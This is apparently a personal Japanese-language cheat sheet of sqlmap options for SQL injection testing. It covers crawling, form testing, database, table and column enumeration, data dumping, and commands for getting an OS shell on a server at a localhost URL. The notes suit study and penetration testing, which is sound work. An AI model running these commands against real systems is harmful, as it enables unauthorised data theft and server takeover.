オプション整理用
-u URL
--proxy
プロキシを設定、BurpSuiteとかに使えそう
--batch
全部質問をデフォルトの回答
--forms
Webページ内のフォーム要素も調査対象に入れる
--dbms=mysql
バックエンドのDBを指定()
-dbms="Microsoft SQL Server"とかも
--thread=5
スレッド数を指定
--crawl=1
クロールする深さ(1はそのパスだけ、2以降がリンクをたどってくれる)
-p user
検査するパラメータをuserのみ指定
-–form -–batchの相性は良い
--batch --answers="keep testing=Y,sitemap=Y,skip further tests=N"
質問時の回答を指定
--crawl-exclude="logout"
crawl時に除外するページを指定
--dbs
データベース名を取得
--tables
テーブル名を取得
--columns
カラム名を取得
-D db_name -T table_name --dump
各指定してデータをダンプ
Linuxサーバのシェル取得:
sqlmap -u http://127.0.0.1/login.php?id=1 –os-shell
Windowsサーバのシェル取得
For a Windows server:
sqlmap -u http://127.0.0.1/login.php?id=1 –os-cmd <cmd>
================
参考になった順
https://www.prodefence.org/important-sqlmap-commands-2/
https://edricteo.com/sqlmap-commands/
読んでないけど参考
https://www.owasp.org/index.php/SQL_Injection_Bypassing_WAF
